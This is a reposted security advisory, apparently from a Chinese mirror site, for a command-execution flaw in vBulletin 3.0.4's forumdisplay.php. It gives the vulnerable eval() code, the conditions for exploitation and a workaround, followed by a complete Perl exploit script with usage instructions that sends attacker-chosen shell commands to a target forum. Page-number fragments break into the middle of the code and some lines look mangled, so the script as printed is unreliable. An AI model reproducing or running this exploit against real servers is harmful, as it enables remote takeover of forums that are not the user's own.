vBulletin forumdisplay.PHP Command Execution Vulnerability
vBulletin is "a powerful and widely used bulletin board system, based on PHP language and mysql database".
A vulnerability in vBulletin's forumdisplay.php allows a remote attacker to cause the PHP script to execute arbitrary code via the 'comma' variable.
Credit:
The information has been provided by al3ndaleeb.
Details
Vulnerable Systems:
* vBulletin version 3.0.4 and prior
Immune Systems:
* vBulletin version 3.0.5 or newer
Vulnerable code in forumdisplay.php:
if ($vboptions['showforumusers'])
{
.
.
.
.
if ($bbuserinfo['userid'])
{
...
$comma = ', ';
}
...
while ($loggedin = $DB_site->fetch_array($forumusers))
{
...
eval('$activeusers .= "' . $comma .
fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln)
$comma = ', ';
...
}
...
}
Prequsites:
* $vboptions['showforumusers'] == True , the admin must set showforumusers ON in vBulletin options
* $bbuserinfo['userid'] == 0 , you must be an visitor/guest
* $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum
* magic_quotes_gpc must be OFF
* You must bypass unset($GLOBALS["$_arrykey"]) code in init.php by using: GLOBALS[]=1
Workaround:
* Disable showforumusers in vbulletin options .
* add the next line before if ($vboptions['showforumusers']) $comma = '';
EXPloit:
#!/usr/bin/perl
# vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net>
#
# Requirement:
# showforumusers ON
#
#
# bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net>
#
# usage :
# vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command>
#
# example :
# vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la"
#
# !! Happy Chinese new Year !!
use IO::Socket;
sub parse_url {
local($url) = @_;
if ($url =~ m#^(\w+):#) {
$protocol = $1;
$protocol =~ tr/A-Z/a-z/;
} else {
return undef;
}
if ($protocol eq "http") {
if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) {
$server = $1;
$server =~ tr/A-Z/a-z/;
[1] [2]
$port = ($2 ne "" ? $2 : $http_port);
$path = ( $3 ? $3 : '/');
return ($protocol, $server, $port, $path);
}
return undef;
}
}
sub urlencode{
my($esc) = @_;
$esc =~ s/^\s+\s+$//gs;
$esc =~ s/([^a-zA-Z0-9_\-.])/UC sprintf("%%%02x",ord($1))/eg;
$esc =~ s/ /\+/g;
$esc =~ s/%20/\+/g;
return $esc;
}
$url = $ARGV[0];
$fid = $ARGV[1];
$cmd = urlencode($ARGV[2]);
$http_port = 80;
$shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma=}}";
@target = parse_url($url);
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $target[1],
PeerPort => $target[2],
) or die "\nUnable to connect\n";
$conn -> autoflush(1);
print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n";
while (<$conn>){
print $_;
}
close $conn;
(出处:http://www.sheup.com)
[1] [2]
>(出处:http://www.sheup.com)
[1] [2] [3]